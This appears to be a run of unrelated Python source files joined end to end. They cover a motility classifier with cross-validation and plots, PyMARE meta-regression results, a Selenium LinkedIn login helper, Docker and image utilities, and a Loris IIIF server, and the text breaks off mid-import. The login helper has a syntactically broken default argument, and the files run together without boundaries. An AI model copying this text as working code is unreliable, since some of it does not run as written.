plt.subplots(dpi=300) ax.plot(fpr, tpr, color="blue", label="ROC curve (area = {:.2f})".format(auc)) ax.plot([0,1], [0,1], '--', color="red", label="Chance") ax.set_title("{} ROC Curve".format(prefix)) ax.set_xlabel("False Positive Rate") ax.set_ylabel("True Positive Rate") ax.set_aspect('equal') ax.legend() if prefix != "": fig.savefig(op.join(output_dir, "{}_roc_plot.png".format(prefix))) else: fig.savefig(op.join(output_dir, "roc_plot.png")) logging.info(f'Saved ROC plot: {op.join(*Path(op.join(output_dir, "*_roc_plot.png")).parts[-2:])}') ### PRECISION-RECALL PLOT precision, recall, _ = metrics.precision_recall_curve(true_Y, prob_Y, pos_label="motile") # Plot PR curve fig, ax = plt.subplots(dpi=300) ax.plot(recall, precision, color="blue") ax.set_title("{} Precision-Recall Curve".format(prefix)) ax.set_xlabel("Recall") ax.set_ylabel("Precision") ax.set_aspect('equal') if prefix != "": fig.savefig(op.join(output_dir, "{}_pr_plot.png".format(prefix))) else: fig.savefig(op.join(output_dir, "pr_plot.png")) logging.info(f'Saved prec-rec plot: {op.join(*Path(op.join(output_dir, "*_pr_plot.png")).parts[-2:])}') ### CONFUSION MATRIX confusion = metrics.confusion_matrix(true_Y, pred_Y, labels=['motile', 'non-motile']) # Plot confusion matrix fig, ax = plt.subplots(dpi=300) ax.imshow(confusion, cmap='Blues') # x-axis formatting ax.set_xlabel("Predicted label") ax.set_xticks([0,1]) ax.set_xticklabels(['motile', 'non-motile']) # y-axis formatting ax.set_ylabel("True label") ax.set_yticks([0,1]) ax.set_yticklabels(['motile', 'non-motile']) # on-square text for i in range(2): for j in range(2): ax.text(j, i, confusion[i,j], ha='center', va='center', color='black') if prefix != "": fig.savefig(op.join(output_dir, "{}_confusion.png".format(prefix))) else: fig.savefig(op.join(output_dir, "confusion.png")) logging.info(f'Saved confusion matrix: {op.join(*Path(op.join(output_dir, "*_confusion.png")).parts[-2:])}') def cross_validate(clf, X, Y, groups, batch_outdir, config): """ Performs k-fold cross validation on provided classifier Parameters ---------- clf: sklearn classifier object Initialized classifier. Any existing learned parameters will be overwritten. X: numpy array Data and features to be trained on. Y: numpy array Labels to be trained on. group: numpy array Same value for tracks within the same experiment. For GroupKFold. batch_outdir: string Directory path to batch output directory config: dict Configuration read from YAML. Returns ------- None. """ ### Read from configuration # number of folds for cross validation cv_folds = config['classifier']['cv_folds'] # directory for cross validation result output output_dir = get_batch_subdir('classifier_dir', batch_outdir, config) # probability threshold for labeling a track as motile threshold = config['classifier']['motility_threshold'] ### Initialize k-fold stratified cross-validation try: # Using group k fold to avoid test/train within same exp skf = GroupKFold(n_splits=cv_folds) except Exception as e: logging.error("Failed to initialize cross validation, skipping:") logging.error(e) return ### Try splitting try: crossval_splits = skf.split(X, Y, groups) for _, (_, _) in enumerate(crossval_splits): pass # Need to re-create generator after spending it crossval_splits = skf.split(X, Y, groups) except Exception as e: logging.error("Failed to split for cross validation, skipping:") logging.error(e) return ### Global AUC plot fig, ax = plt.subplots(dpi=300) ax.plot([0,1], [0,1], '--', color="red", label="Chance") ax.set_title("Crossval ROC Curve") ax.set_xlabel("False Positive Rate") ax.set_ylabel("True Positive Rate") ax.set_aspect('equal') ### Global classification report output report_fp = op.join(output_dir, "crossval_report.txt") # write to file with open(report_fp, 'w') as f: f.write("Classification Report with threshold {}\n".format(threshold)) for curr_fold, (train_index, test_index) in enumerate(crossval_splits): logging.info(f"Crossval fold {curr_fold}") # For each split... train_X = X[train_index] train_Y = Y[train_index] test_X = X[test_index] test_Y = Y[test_index] # Train model clf.fit(train_X, train_Y) # Predict probabilities for AUC curve pred_Y = clf.predict_proba(test_X) pred_classes = clf.classes_ # predict_proba() returns probs for both classes, find out which is motile motile_col = np.where(pred_classes == 'motile')[0][0] pred_Y = pred_Y[:,motile_col] # Use configured threshold to assign labels 'motile' and 'non-motile' num_tracks = len(pred_Y) pred_Y_labels = np.array(['non-motile'] * num_tracks, dtype=object) pred_Y_labels[pred_Y > threshold] = 'motile' binary_test_Y = [1 if x=='motile' else 0 for x in test_Y] # Write to reports report = metrics.classification_report(test_Y, pred_Y_labels) with open(report_fp, 'a') as f: f.write("\n") f.write("Fold {}".format(curr_fold)) f.write(report) # Calculate ROC and AUC and add to plot fpr, tpr, _ = metrics.roc_curve(test_Y, pred_Y, pos_label='motile') auc = metrics.roc_auc_score(binary_test_Y, pred_Y) ax.plot(fpr, tpr, label="Fold {0} (area = {1:.2f})".format(curr_fold, auc)) ax.legend() fig.savefig(op.join(output_dir, "crossval_roc_plot.png")) def train(experiments, batch_outdir, config, hyperparams={"max_depth": 10}): """ Trains an sklearn random forest model on input features and saves it as a pickle Parameters ---------- experiments: list List of experiments generated by pipeline-level glob batch_outdir: string Output directory for batch-level metrics and trained model config: dict Configuration dictionary read in by pipeline from YAML hyperparams: dict Hyperparameters for model training. Exposed for DOMINE optimization. NOTE: Temporarily defaults to {"max_depth": 5} NOTE: Do not add hyperparameters to config, as it will be fixed eventually Returns ------- None """ # Batch-level feature and label storage batch_X = [] batch_Y = [] groups = [] feat_columns = None for group_id, exp in enumerate(experiments): # Get feature CSV filepath feat_subdir = get_exp_subdir('features_dir', exp, config) feat_filepath = op.join(feat_subdir, config['features']['output']) # Read in feature CSV with open(feat_filepath, 'r') as f: reader = csv.DictReader(f) # Detect empty feature CSVs if reader.fieldnames is None: logging.warning(f'No track features found in {feat_filepath}. Skipping.') continue # Set feature column names if they haven't been determined if feat_columns is None: feat_columns = [feat for feat in reader.fieldnames if (feat not in IGNORE_FEATS)] logging.info(f'Using following features for training: {feat_columns}') for row in reader: # Assert that the motility column exists if 'motility' not in row.keys(): # break to catch the empty dataset break # Add label to label set batch_Y.append(row['motility'].lower()) # Add features to feature set batch_X.append([row[feat] for feat in feat_columns]) # Record group for cross-validation groups.append(group_id) batch_X = np.array(batch_X).astype(np.float32) batch_Y = np.array(batch_Y, dtype=object) groups = np.array(groups) if not batch_X.size: logging.error("No valid rows found in features file, exiting training without output.") return ### FILTER LABELS ### TODO: Decide what to do with "Ambiguous" or other labels ### Currently only "Motile" and "Non-Motile" are kept. 07/29/2020 JL keep_indices = [] # indices to keep found_nonlabels = set() # record found bad labels drop_count = 0 # number of tracks filtered out # Build binary mask of rows with non-standard labels for deletion for i in range(len(batch_X)): if batch_Y[i].lower() not in ['motile', 'non-motile']: found_nonlabels.add(batch_Y[i]) drop_count += 1 else: keep_indices.append(i) # Don't train on any tracks that aren't Motile or Non-motile if drop_count: logging.warning("Non-standard labels encountered: {}".format(found_nonlabels)) logging.warning("{} tracks dropped from training.".format(drop_count)) # This uses the binary mask to only keep rows where the mask val is 1 batch_X = batch_X[keep_indices] batch_Y = batch_Y[keep_indices] groups = groups[keep_indices] if not batch_X.size: logging.error("No tracks remain after label filtering, exiting training without output.") return ### PREPROCESS OR AUGMENT ### TODO: At some point, if we use anything other than decision trees, we'll ### need to standardize features or something. Do that here, and consider ### writing helper functions. # replacing infinite features with numbers batch_X = np.nan_to_num(batch_X) ### INITIALIZE MODEL clf = RandomForestClassifier(**hyperparams) ### CROSS VALIDATION if config['classifier']['do_cross_validation']: logging.info('Cross validation enabled, running...') cross_validate(clf, batch_X, batch_Y, groups, batch_outdir, config) ### TRAIN MODEL ON ALL TRAINING DATA ### This occurs regardless of cross validation clf.fit(batch_X, batch_Y) ### SAVE MODEL TO SPECIFIED PATH class_dir = get_batch_subdir('classifier_dir', batch_outdir, config) model_savepath = op.join(class_dir, config['classifier']['model_savepath']) with open(model_savepath, 'wb') as f: pickle.dump((clf, feat_columns), f) logging.info(f'Saved trained model: {op.join(*Path(model_savepath).parts[-2:])}') ### SAVE METRICS # Predict probabilities for AUC curve and Precision-Recall curve pred_Y = clf.predict_proba(batch_X) pred_classes = clf.classes_ # predict_proba() returns probs for both classes, find out which is motile motile_col = np.where(pred_classes == 'motile')[0][0] prob_Y = pred_Y[:,motile_col] # Use configured threshold to assign labels 'motile' and 'non-motile' threshold = config['classifier']['motility_threshold'] num_tracks = len(prob_Y) pred_Y_labels = np.array(['non-motile'] * num_tracks, dtype=object) pred_Y_labels[prob_Y > threshold] = 'motile' # Write metrics write_metrics(batch_Y, pred_Y_labels, prob_Y, batch_outdir, config, "train") def predict(experiment, config): """ Tests an sklearn model on input features and writes prediction JSONs Parameters ---------- experiment: str The experiment to predict on config: dict Configuration dictionary read in by pipeline from YAML Returns ------- None TODO: Return metrics for DOMINE optimization? This would be done by writing to a file via directory helpers. Toga will be able to override directory logic to obtain metrics. """ model_path = config['_model_absolute_path'] ### LOAD CLASSIFIER FROM PICKLE try: with open(model_path, 'rb') as f: clf, feat_columns = pickle.load(f) logging.info(f"Found and loaded {model_path}") except: logging.warning(f"Failed to open classifier {model_path}") return None # Storage for batch-level metrics batch_true_Y = [] batch_pred_Y = [] batch_prob_Y = [] batch_alltracks = 0 # Get feature CSV filepath feat_subdir = get_exp_subdir('features_dir', experiment, config) feat_filepath = op.join(feat_subdir, config['features']['output']) # Get track JSON directory track_subdir = get_exp_subdir('track_dir', experiment, config) # Get output predict directory predict_subdir = get_exp_subdir('predict_dir', experiment, config, rm_existing=True) if not os.path.exists(feat_filepath): logging.error(f"Feature file {feat_filepath} missing. Aborting classification.") return ### READ FEATURES FROM CSV FILE exp_X = [] exp_Y = [] # labels are for metrics track_ID = [] with open(feat_filepath, 'r') as f: reader = csv.DictReader(f) # Assert features aren't empty or no header if not reader.fieldnames: logging.error(f"Features are empty or lacks header row.") return None # Assert that its features list is the same as training this_keys = [feat for feat in reader.fieldnames if (feat not in IGNORE_FEATS)] if set(this_keys) != set(feat_columns): logging.error(f"Read features list {this_keys} doesn't match model's {feat_columns}") return None for row in reader: # Save labels if they exist if 'motility' not in row.keys(): exp_Y.append('') else: exp_Y.append(row['motility'].lower()) # Assemble features in the same order as training data exp_X.append([row[feat] for feat in feat_columns]) track_ID.append(int(row['track'])) exp_X = np.array(exp_X).astype(np.float32) exp_Y = np.array(exp_Y, dtype=object) if exp_X.size == 0: logging.error("No tracks found in directory.") return None ### PREPROCESS OR AUGMENT ### TODO: At some point, if we use anything other than decision trees, we'll ### need to standardize features or something. Do that here, and consider ### writing helper functions. # replacing infinite features with numbers exp_X = np.nan_to_num(exp_X) ### PREDICT pred_Y = clf.predict_proba(exp_X) # predict_proba() returns probs for both classes, find out which is motile pred_classes = clf.classes_ motile_col = np.where(pred_classes == 'motile')[0][0] prob_Y = pred_Y[:,motile_col] # Use configured threshold to classify into 'motile' and 'other' # TODO: Using 'other' here for visualizer but 'non-motile' is probably better # Change 'other' to 'non-motile' in both classifier and visualizer threshold = config['classifier']['motility_threshold'] num_tracks = len(prob_Y) pred_Y_labels = np.array(['other'] * num_tracks, dtype=object) pred_Y_labels[prob_Y > threshold] = 'motile' # Metrics writer expects 'motile' and 'non-motile' metrics_compat = np.array(['non-motile'] * num_tracks, dtype=object) metrics_compat[prob_Y > threshold] = 'motile' ### WRITE TO PREDICT TRACK JSONS track_fpaths = sorted(glob.glob(op.join(track_subdir, '*.json'))) for i in range(num_tracks): # new keys and values to be added to the JSON update_dict = {'classification': pred_Y_labels[i], 'probability_motility': prob_Y[i]} # we're doing this just in case sequences are nonconsecutive with open(track_fpaths[track_ID[i]], 'r') as f: data = json.load(f) data.update(update_dict) # write out JSON files with open(op.join(predict_subdir, op.basename(track_fpaths[track_ID[i]])), 'w') as f: json.dump(data, f, indent=4) logging.info(f'Saved predictions: {op.join(*Path(predict_subdir).parts[-2:])}') ### IF TRACKS HAVE LABELS, ADD TO BATCH STORAGE FOR METRICS for i in range(num_tracks): if exp_Y[i].lower() in ['motile', 'non-motile']: # this track has a valid label batch_true_Y.append(exp_Y[i]) batch_pred_Y.append(metrics_compat[i]) batch_prob_Y.append(prob_Y[i]) batch_alltracks += num_tracks return (batch_true_Y, batch_pred_Y, batch_prob_Y, num_tracks) def predict_batch_metrics(batch_true_Y, batch_pred_Y, batch_prob_Y, batch_alltracks, batch_outdir, config): '''Calculate batch metrics if labels exist''' if len(batch_true_Y): logging.info("{} of {} tracks have labels, calculating batch metrics".format( len(batch_true_Y), batch_alltracks)) write_metrics(batch_true_Y, batch_pred_Y, batch_prob_Y, batch_outdir, config, "predict") pymare/results.py0 """Tools for representing and manipulating meta-regression results.""" import itertools from functools import lru_cache from inspect import getfullargspec from warnings import warn import numpy as np import pandas as pd import scipy.stats as ss try: import arviz as az except: az = None from .stats import q_gen, q_profile class MetaRegressionResults: """Container for results generated by PyMARE meta-regression estimators. Args: estimator (`pymare.estimators.BaseEstimator`): The estimator used to produce the results. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. fe_params (NDarray): Fixed-effect coefficients. Must be a 2-d numpy array with shape p x d, where p is the number of predictors, and d is the number of parallel datasets (typically 1). fe_cov (NDArray): The p x p inverse covariance (or precision) matrix for the fixed effects. tau2 (NDArray, float, optional): A 1-d array containing the estimated tau^2 value for each parallel dataset (or a float, for a single dataset). May be omitted by fixed-effects estimators. """ def __init__(self, estimator, dataset, fe_params, fe_cov, tau2=None): self.estimator = estimator self.dataset = dataset self.fe_params = fe_params self.fe_cov = fe_cov self.tau2 = tau2 @property @lru_cache(maxsize=1) def fe_se(self): cov = np.atleast_3d(self.fe_cov) # 3rd dim is for parallel datasets return np.sqrt(np.diagonal(cov)).T @lru_cache(maxsize=16) def get_fe_stats(self, alpha=0.05): beta, se = self.fe_params, self.fe_se z_se = ss.norm.ppf(1 - alpha / 2) z = beta / se stats = { "est": beta, "se": se, "ci_l": beta - z_se * se, "ci_u": beta + z_se * se, "z": z, "p": 1 - np.abs(0.5 - ss.norm.cdf(z)) * 2, } return stats @lru_cache(maxsize=16) def get_re_stats(self, method="QP", alpha=0.05): if method == "QP": n_iters = np.atleast_2d(self.tau2).shape[1] if n_iters > 10: warn( "Method 'QP' is not parallelized; it may take a while to " "compute CIs for {} parallel tau^2 values.".format(n_iters) ) # Make sure we have an estimate of v if it wasn't observed v = self.estimator.get_v(self.dataset) cis = [] for i in range(n_iters): args = { "y": self.dataset.y[:, i], "v": v[:, i], "X": self.dataset.X, "alpha": alpha, } try: q_cis = q_profile(**args) except Exception as exc: q_cis = {"ci_l": np.nan, "ci_u": np.nan} cis.append(q_cis) else: raise ValueError( "Invalid CI method '{}'; currently only 'QP' is available.".format(method) ) return { "tau^2": self.tau2, "ci_l": np.array([ci["ci_l"] for ci in cis]), "ci_u": np.array([ci["ci_u"] for ci in cis]), } @lru_cache(maxsize=16) def get_heterogeneity_stats(self): v = self.estimator.get_v(self.dataset) q_fe = q_gen(self.dataset.y, v, self.dataset.X, 0) df = self.dataset.y.shape[0] - self.dataset.X.shape[1] i2 = np.maximum(100.0 * (q_fe - df) / q_fe, 0.0) h = np.maximum(np.sqrt(q_fe / df), 1.0) p = ss.chi2.sf(q_fe, df) return {"Q": q_fe, "p(Q)": p, "I^2": i2, "H": h} def to_df(self, alpha=0.05): """Return a pandas DataFrame summarizing fixed effect results.""" b_shape = self.fe_params.shape if len(b_shape) > 1 and b_shape[1] > 1: raise ValueError( "More than one set of results found! A summary " "table cannot be displayed for multidimensional " "results at the moment." ) fe_stats = self.get_fe_stats(alpha).items() df = pd.DataFrame({k: v.ravel() for k, v in fe_stats}) df["name"] = self.dataset.X_names df = df.loc[:, ["name", "est", "se", "z", "p", "ci_l", "ci_u"]] ci_l = "ci_{:.6g}".format(alpha / 2) ci_u = "ci_{:.6g}".format(1 - alpha / 2) df.columns = ["name", "estimate", "se", "z-score", "p-value", ci_l, ci_u] return df def permutation_test(self, n_perm=1000): """Run permutation test. Args: n_perm (int):Number of permutations to generate. The actual number used may be smaller in the event of an exact test (see below), but will never be larger. Returns: An instance of class PermutationTestResults. Notes: If the number of possible permutations is smaller than n_perm, an exact test will be conducted. Otherwise an approximate test will be conducted by randomly shuffling the outcomes n_perm times (or, for intercept-only models, by randomly flipping their signs). Note that for closed-form estimators (e.g., 'DL' and 'HE'), permuted datasets are estimated in parallel. This means that one can often set very high n_perm values (e.g., 100k) with little performance degradation. """ n_obs, n_datasets = self.dataset.y.shape has_mods = self.dataset.X.shape[1] > 1 fe_stats = self.get_fe_stats() re_stats = self.get_re_stats() # create results arrays fe_p = np.zeros_like(self.fe_params) rfx = self.tau2 is not None tau_p = np.zeros((n_datasets,)) if rfx else None # Calculate # of permutations and determine whether to use exact test if has_mods: n_exact = np.math.factorial(n_obs) else: n_exact = 2 ** n_obs if n_exact < n_perm: perms = np.array(list(itertools.product([-1, 1], repeat=n_obs))).T exact = n_exact < n_perm if exact: n_perm = n_exact # Loop over parallel datasets for i in range(n_datasets): y = self.dataset.y[:, i] y_perm = np.repeat(y[:, None], n_perm, axis=1) # for v, we might actually be working with n, depending on estimator has_v = "v" in getfullargspec(self.estimator.fit).args[1:] v = self.dataset.v[:, i] if has_v else self.dataset.n[:, i] v_perm = np.repeat(v[:, None], n_perm, axis=1) if has_mods: if exact: perms = itertools.permutations(range(n_obs)) for j, inds in enumerate(perms): inds = np.array(inds) y_perm[:, j] = y[inds] v_perm[:, j] = v[inds] else: for j in range(n_perm): np.random.shuffle(y_perm[:, j]) np.random.shuffle(v_perm[:, j]) else: if exact: y_perm *= perms else: signs = np.random.choice(np.array([-1, 1]), (n_obs, n_perm)) y_perm *= signs # Pass parameters, remembering that v may actually be n kwargs = {"y": y_perm, "X": self.dataset.X} kwargs["v" if has_v else "n"] = v_perm params = self.estimator.fit(**kwargs).params_ fe_obs = fe_stats["est"][:, i] if fe_obs.ndim == 1: fe_obs = fe_obs[:, None] fe_p[:, i] = (np.abs(fe_obs) < np.abs(params["fe_params"])).mean(1) if rfx: abs_obs = np.abs(re_stats["tau^2"][i]) tau_p[i] = (abs_obs < np.abs(params["tau2"])).mean() # p-values can't be smaller than 1/n_perm params = {"fe_p": np.maximum(1 / n_perm, fe_p)} if rfx: params["tau2_p"] = np.maximum(1 / n_perm, tau_p) return PermutationTestResults(self, params, n_perm, exact) class CombinationTestResults: """Container for results generated by p-value combination methods. Args: estimator (`pymare.estimators.BaseEstimator`): The estimator used to produce the results. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. z (NDArray, optional): Array of z-scores. p (NDArray, optional): Array of right-tailed p-values. """ def __init__(self, estimator, dataset, z=None, p=None): self.estimator = estimator self.dataset = dataset if p is None and z is None: raise ValueError("One of 'z' or 'p' must be provided.") self._z = z self._p = p @property @lru_cache(maxsize=1) def z(self): if self._z is None: self._z = ss.norm.isf(self.p) return self._z @property @lru_cache(maxsize=1) def p(self): if self._p is None: self._p = ss.norm.sf(self.z) return self._p def permutation_test(self, n_perm=1000): """Run permutation test. Args: n_perm (int): Number of permutations to generate. The actual number used may be smaller in the event of an exact test (see below), but will never be larger. Returns: An instance of class PermutationTestResults. Notes: If the number of possible permutations is smaller than n_perm, an exact test will be conducted. Otherwise an approximate test will be conducted by randomly shuffling the outcomes n_perm times (or, for intercept-only models, by randomly flipping their signs). Permuted datasets are processed in parallel. This means that one can often set very high n_perm values (e.g., 100k) with little performance degradation. """ n_obs, n_datasets = self.dataset.y.shape # create results arrays p_p = np.zeros_like(self.z) # Calculate # of permutations and determine whether to use exact test n_exact = 2 ** n_obs if n_exact < n_perm: perms = np.array(list(itertools.product([-1, 1], repeat=n_obs))).T exact = True n_perm = n_exact else: exact = False # Initialize a copy of the estimator to prevent overwriting results est = self.estimator.__class__(mode=self.estimator.mode) # Loop over parallel datasets for i in range(n_datasets): y = self.dataset.y[:, i] y_perm = np.repeat(y[:, None], n_perm, axis=1) if exact: y_perm *= perms else: signs = np.random.choice(np.array([-1, 1]), (n_obs, n_perm)) y_perm *= signs # Some combination tests can handle weights (passed as v) kwargs = {"z": y_perm} if "w" in getfullargspec(est.fit).args: kwargs["w"] = self.dataset.v params = est.fit(**kwargs).params_ p_obs = self.z[i] if p_obs.ndim == 1: p_obs = p_obs[:, None] p_p[i] = (p_obs > params["p"]).mean() # p-values can't be smaller than 1/n_perm p_p = np.maximum(1 / n_perm, p_p) return PermutationTestResults(self, {"fe_p": p_p}, n_perm, exact) class PermutationTestResults: """Lightweight container to hold and display permutation test results.""" def __init__(self, results, perm_p, n_perm, exact=False): self.results = results self.perm_p = perm_p self.n_perm = n_perm self.exact = exact def to_df(self, **kwargs): """Export permutation test results as a pandas DF. Args: kwargs: Keyword arguments to pass onto to_df() calls of parent results class (e.g., in case of MetaRegressionResults class, `alpha` is available). Returns: A pandas DataFrame that adds columns to the standard fixed effect result table based on permutation test results. A column is added for every name found in both the parent DF and the params dictionary passed at initialization. """ df = self.results.to_df(**kwargs) c_ind = list(df.columns).index("p-value") df.insert(c_ind + 1, "p-value (perm.)", self.perm_p["fe_p"]) return df class BayesianMetaRegressionResults: """Container for MCMC sampling-based PyMARE meta-regression estimators. Args: data (`StanFit4Model` or `InferenceData`): Either a StanFit4Model instanced returned from PyStan or an ArviZ InferenceData instance. dataset (`pymare.Dataset`): A Dataset instance containing the inputs to the estimator. ci (float, optional): Desired width of highest posterior density (HPD) interval. Defaults to 95%. """ def __init__(self, data, dataset, ci=95.0): if az is None: raise ValueError( "ArviZ package must be installed in order to work" " with the BayesianMetaRegressionResults class." ) if data.__class__.__name__ == "StanFit4Model": data = az.from_pystan(data) self.data = data self.dataset = dataset self.ci = ci def summary(self, include_theta=False, **kwargs): """Summarize the posterior estimates via ArviZ. Args: include_theta (bool, optional): Whether or not to include the estimated group-level means in the summary. Defaults to False. kwargs: Optional keyword arguments to pass onto ArviZ's summary(). Returns: A pandas DataFrame, unless the `fmt="xarray"` argument is passed in kwargs, in which case an xarray Dataset is returned. """ var_names = ["beta", "tau2"] if include_theta: var_names.append("theta") var_names = kwargs.pop("var_names", var_names) return az.summary(self.data, var_names, **kwargs) def plot(self, kind="trace", **kwargs): """Generate various plots of the posterior estimates via ArviZ. Args: kind (str, optional): The type of ArviZ plot to generate. Can be any named function of the form "plot_{}" in the ArviZ namespace (e.g., 'trace', 'forest', 'posterior', etc.). Defaults to 'trace'. kwargs: Optional keyword arguments passed onto the corresponding ArviZ plotting function (see ArviZ docs for details). Returns: A matplotlib or bokeh object, depending on plot kind and kwargs. """ name = "plot_{}".format(kind) plotter = getattr(az, name) if plotter is None: raise ValueError("ArviZ has no plotting function '{}'.".format(name)) plotter(self.data, **kwargs) 0 import getpass import time from linkedin_scraper import constants as c from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.common.by import By from selenium.webdriver.support import expected_conditions as EC def __prompt_email_password(): u = input("Email: ") p = getpass.getpass(prompt="Password: ") return (u, p) def page_has_loaded(driver): page_state = driver.execute_script('return document.readyState;') return page_state == 'complete' def login(driver, email=None, password=, cookie=None, timeout=10): if cookie is not None: return _login_with_cookie(driver, cookie) if not email or not password: email, password = __prompt_email_password() print("1L") driver.get("https://www.linkedin.com/login") time.sleep(2) print("2L") element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, "username"))) email_elem = driver.find_element_by_id("username") email_elem.send_keys(email) time.sleep(3) print("3L") password_elem = driver.find_element_by_id("password") password_elem.send_keys(password) time.sleep(5) print("4L") password_elem.submit() try: print(driver.current_url) if driver.current_url == 'https://www.linkedin.com/checkpoint/lg/login-submit': remember = driver.find_element_by_id(c.REMEMBER_PROMPT) if remember: remember.submit() element = WebDriverWait(driver, timeout).until(EC.presence_of_element_located((By.ID, c.VERIFY_LOGIN_ID))) print('pass') except Exception as ex: print(f"Por el error {str(ex)}") pass def _login_with_cookie(driver, cookie): driver.get("https://www.linkedin.com/login") driver.add_cookie({ "name": "li_at", "value": cookie }) #!/usr/bin/python3 ''' 这个写出来是为了测试main包好不好使的 这个基本上是一个test的例子, 以后基本上就按照这个文件写 ''' import sys sys.path.append("..") import insummer from insummer.query_expansion import EntityFinder from insummer.read_conf import config from insummer.query_expansion1.semantic_complement import add def test1(): conf = config("../../conf/question.conf") f = open(conf["title_pos"]) titles = f.readlines() indx = 0 for title in titles: if indx > 20: break naive_finder = EntityFinder(title) naive_finder.find(display=True) indx += 1 def test2(): return add(1,1) if __name__ == '__main__': print(test2()) testcompose/waiters/waiting_utils.py1-10 from datetime import datetime from time import sleep from docker.models.containers import Container from testcompose.models.container.running_container_attributes import ( PossibleContainerStates, RunningContainerAttributes, ) class WaitingUtils: @staticmethod def container_status( test_container: Container, status="running", delay_ms=2000, timeout_ms=40000 ) -> bool: """Method useful for checking a running container status to allow for fetching the latest attribute from the container Args: status (str, optional): Status to check for. Defaults to "running". delay (float, optional): Delay time before the next check. Defaults to 0.1. timeout (int, optional): Defaults to 40. """ print(status) if status.lower() not in [ PossibleContainerStates.EXITED.value, PossibleContainerStates.RUNNING.value, ]: raise ValueError("Status must be one of running or exited") start = datetime.now() while not (status == (RunningContainerAttributes(**test_container.attrs)).State.Status): if (datetime.now() - start).total_seconds() * 1000 > timeout_ms: print(f"Container status {status} not obtained after {timeout_ms} ms") return False sleep(delay_ms / 1000) test_container.reload() print(f"Found Status {status}") return True guhaiqiao/Flower_app import base64 import os import time from PIL import Image def imageToStr(image): with open(image, 'rb') as f: image_byte = base64.b64encode(f.read()) image_str = image_byte.decode('ascii') return image_str def strToImage(str, filename): image_str = str.encode('ascii') image_byte = base64.b64decode(image_str) image_json = open(filename, 'wb') image_json.write(image_byte) # 将图片存到当前文件的fileimage文件中 image_json.close() def get_size(file): # 获取文件大小:KB size = os.path.getsize(file) return size / 1024 def get_outfile(infile, outfile=''): if outfile: return outfile dir, suffix = os.path.splitext(infile) outfile = '{}_out{}'.format(dir, suffix) return outfile def resize(infile, limit): """缩放图片尺寸 infile: 压缩源文件 limit: 长或宽的最大像素个数 return: 图片是否压缩 """ img = Image.open(infile) scale = 1 flag = 0 w, h = img.size if w > limit or h > limit: scale = max(w / limit, h / limit) flag = 1 Img = img.resize((int(w / scale), int(h / scale)), Image.ANTIALIAS) Img.save(get_outfile(infile)) return flag if __name__ == '__main__': time1 = time.time() path = "/mnt/d/vscode/Flower_app/server/image/user_image" filename1 = "/line.jpg" filename2 = "/default_out.jpg" # compress_image(path + filename1, mb=3) resize(path + filename1, 400) time2 = time.time() print('总共耗时:' + str(time2 - time1) + 's') from loris.compliance import Compliance from loris.dispatcher_mixin import DispatcherMixin from loris.helpers.import_class import import_class from loris.helpers.safe_lru_dict import SafeLruDict from loris.info.jp2_extractor import Jp2Extractor from loris.info.pillow_extractor import PillowExtractor from loris.requests.iiif_request import IIIFRequest from loris.resolvers import Resolvers from os import path from pkg_resources import resource_filename from sys import stderr import cherrypy import logging import logging.config import yaml cherrypy_app_conf = { "/": { "tools.trailing_slash.on": False, # this should _always_ be False "request.dispatch": cherrypy.dispatch.MethodDispatcher(), "tools.sessions.on": False, }, "/favicon.ico": { "tools.staticfile.on": True, "tools.staticfile.filename": resource_filename("loris", "www/favicon.ico"), "tools.response_headers.on": True, "tools.response_headers.headers": [ ("cache-control", f"max-age={60*60*24*365}, public"), ("allow", "GET"), ], }, } class LorisApp(DispatcherMixin): def __init__(self): super().__init__() cfg_dict = self._load_config_files() self._configure_logging(cfg_dict["logging"]) compliance = self._init_compliance(cfg_dict["iiif_features"]) app_configs = self._normalize_app_configs(cfg_dict["application"]) # Below is a cheat to keep us from having to pass so much static stuff # around. See requests.iiif_request.IIIFRequest and # requests.meta_request.MetaRequest to understand what's going on. IIIFRequest.app_configs = app_configs IIIFRequest.compliance = compliance IIIFRequest.extractors = self._init_extractors(compliance, app_configs) IIIFRequest.info_cache = SafeLruDict(size=400) IIIFRequest.resolvers = self._init_resolvers(cfg_dict["resolvers"]) IIIFRequest.transcoders = self._init_transcoders(cfg_dict["transcoders"]) @property def _package_dir(self): # pragma: no cover return path.dirname(path.realpath(__file__)) def _normalize_app_configs(self, app_configs): if app_configs["server_uri"] is not None: if app_configs["server_uri"].endswith("/"): app_configs["server_uri"] = app_configs["server_uri"][:-1] return app_configs def _load_config_files(self): # Should probably have coverage for this. Mocks? cfg_dict = {} for cfg_path in self._find_config_files(): try: cfg_dict.update(self._load_yaml_file(cfg_path)) print(f"Config file found at {cfg_path}") except FileNotFoundError: print(f"No config file found at {cfg_path}", file=stderr) return cfg_dict def _load_yaml_file(self, yaml_path): with open(yaml_path) as p: return yaml.safe_load(p) def _find_config_files(self): # TODO: https://github.com/jpstroop/loris-redux/issues/44 # returns paths to the config files in order of preference paths = [] paths.append(path.join(self._package_dir, "config.yaml")) paths.append("/etc/loris/config.yaml") paths.append(path.expanduser("~/.loris/config.yaml")) return paths def _configure_logging(self, cfg_dict): # pragma: no cover global logger logging.config.dictConfig(cfg_dict) logger = logging.getLogger("loris") logger.debug("Logging configured") def _init_compliance(self, cfg_dict): compliance = Compliance(cfg_dict) msg = f"Compliance is level {int(compliance)}" logger.info(msg) return compliance def _init_extractors(self, compliance, app_configs): pillow_extractor = PillowExtractor(compliance, app_configs) jp2_extractor = Jp2Extractor(compliance, app_configs) return { "jpg": pillow_extractor, "png": pillow_extractor, "tif": pillow_extractor, "jp2": jp2_extractor, } def _init_resolvers(self, resolver_list, include_example=True): resolvers = Resolvers(resolver_list) # add a resolver that resolves to the root of the package for viewing # sample files if include_example: description = """\ This is a sample resolver to test that the server is working. Using \ `loris:sample.jp2` as an identifier should return a test image.\ """ cfg = {"root": self._package_dir, "description": description} klass = "loris.resolvers.file_system_resolver.FileSystemResolver" resolvers.add_resolver(klass, "loris", cfg) return resolvers def _init_transcoders(self, transcoder_list): transcoders = {} for entry in transcoder_list: name = entry.pop("class") Klass = import_class(name) src_fmt = entry.pop("src_format") transcoders[src_fmt] = Klass(entry) msg = f"Initialized transcoders[{src_fmt}] with {name}" logger.info(msg) return transcoders laughtervv/SGPN import argparse import tensorflow as tf import os os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152 import provider from utils.test_utils 